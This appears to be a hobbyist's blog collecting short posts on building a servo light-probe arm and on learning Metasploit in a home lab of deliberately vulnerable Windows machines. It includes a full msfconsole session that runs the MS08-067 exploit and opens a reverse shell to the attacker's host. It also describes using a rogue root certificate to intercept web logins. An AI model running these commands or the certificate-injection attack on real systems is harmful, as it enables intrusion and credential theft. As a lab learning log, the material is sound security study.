Light Probe – More Woodworking

Got into the shop and (crudely) built out the next part of the light arm.  I have a seemingly endless supply of scrap 3/4″ plywood laying around, so that’s what I used. Made the lower part of the rotating mechanism 10 cm square then rounded the corners for effect. The vertical part of the rotating mechanism is a simple 10cm by 12 cm. I recessed the servo just like last time. Finally, I attached a 1/2″ x 1/2″ piece of scrap basswood to the vertical axis servo.  Ugly as sin, but it works well enough.

Here you can see the unit disassembled into its two pieces. To assemble it I just slide the servo horn onto the shaft.

 

 

Here’s the unit assembled. the top portion spins on the X axis and the arm spins on the Y axis.  I’m going to attach the photo resistors to a mechanism at the end of the arm.

 

That’s it for now.

Messing Around in Metasploit

Over lunch break I’ve just been reading up on some general things you can do in Metasploit.  Been playing some misc. modules such as:

  • auxiliary/scanner/portscan/syn
  • auxiliary/scanner/portscan/tcp
  • auxiliary/scanner/smb/smb_version

I also learned about the IP Idle Scan technique. Very clever indeed. There’s a module for that too. scanner/ip/ipidseq

References:
https://www.offensive-security.com/metasploit-unleashed/port-scanning/
https://nmap.org/book/idlescan.html

 

Injecting Certificates?

Tonight I’m messing around with post/windows/manage/inject_ca. Specifically trying to get it to work.  Seems like a handy little item to have for SSL based MITM attacks.  Create a root CA, use an exploit to add it to the root of a target, then lay low and wait for web logins.  Doubly useful for those HSTS secured sites…

I didn’t realize that certificates are just stored as binary blobs in the registry. Neat.

Also, XP SP3 just straight up doesn’t understand SHA512. At all. I had to apply a hotfix to get it up and running.

References:
https://labs.mwrinfosecurity.com/blog/masquerading-as-a-windows-system-binary-using-digital-signatures/
https://support.microsoft.com/en-us/help/968730/windows-server-2003-and-windows-xp-clients-cannot-obtain-certificates

Mastering the Obvious

Today I learned the difference between true meterpreter and the reverse shell. Previously I had used meterpreter to get a shell. Didn’t know you could just have it give you one. Though I’ve found it somewhat inconvenient not having the full meterpreter suite available, so my preference is definitely the meterpreter vs the straight reverse shell.

windows/meterpreter/reverse_tcp == Standard Meterpreter
generic/shell_reverse_tcp == command prompt. Yes, duh, a shell.

Also found this nifty cheat sheet. (PDF warning)

Clubbing Baby Seals

So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines.  While this doesn’t really represent any kind of real world situation it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.

  • XP SP3 or unpatched 7.
  • Adobe Reader 8.0
  • Adobe Air 20.0.0.204
  • Adobe Flash 18.0.0.194
  • Chrome 22.0.1229.0
  • Firefox 17.0
  • Java JRE 7 update 2
  • Realplayer 15.0.5.109
  • Shockwave 11.0.3.471

The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!

The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.

I initially tried using exploit/windows/dcerpc/ms03_026_dcom.  The first run indicated the port wasn’t open. Which made sense because I never opened that port on the target. So I created a file share to “prime the pump”.  Still no dice.

Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.

root@KALI:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.50 (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)

I’ll probably mess around more later today.

Fixing “Database not connected or cache not built” in Metasploit

Configure the database service to start automatically
update-rc.d postgresql enable

Initialize the database
msfdb init

Launch msfconsole and rebuild the cache
root@KALI:~# msfconsole
msf > db_rebuild_cache

Wait for awhile. It will finish eventually.